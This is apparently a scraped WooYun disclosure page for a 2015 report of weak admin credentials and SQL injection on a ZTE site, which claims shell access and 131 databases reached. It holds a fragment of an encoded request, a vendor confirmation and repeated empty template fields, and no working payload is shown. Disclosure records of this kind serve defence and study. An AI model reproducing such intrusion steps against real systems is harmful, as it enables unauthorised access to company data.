pPs1PTvScwlY%2BZf8lXVMjIvY0%2BT5t37joeycJY8lhHnEwY1c7G%2Fgu2g8TZEy1l3%2Fax5ODpt4cycnPvNzBL%2Fduo1EAzMeH0U9syMeDDzaGs00lqxJa8EdWOhd64O1jfkGC8QGchA%3D%3D&DDLflag=&DDLNode=1&ddlLang=&TextBox1=a&Button4=%E6%9F%A5%E6%89%BE

131个库

修复方案：

你懂的

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-10-10 14:50

厂商回复：

感谢~

漏洞评价：

评价

2015-10-10 14:40 | 日出东方 ( 普通白帽子 | Rank:398 漏洞数:126 )

小厂商？

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145763

漏洞标题：中兴某站后台弱口令+后台sql注入(可弹shell)

相关厂商：中兴通讯股份有限公司

漏洞作者：路人甲

提交时间：2015-10-10 14:35

修复时间：2015-11-24 14:52

公开时间：2015-11-24 14:52

漏洞类型：后台弱口令

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145763

漏洞标题：中兴某站后台弱口令+后台sql注入(可弹shell)

相关厂商：中兴通讯股份有限公司

漏洞作者： 路人甲

提交时间：2015-10-10 14:35

修复时间：2015-11-24 14:52

公开时间：2015-11-24 14:52

漏洞类型：后台弱口令

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0145763"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云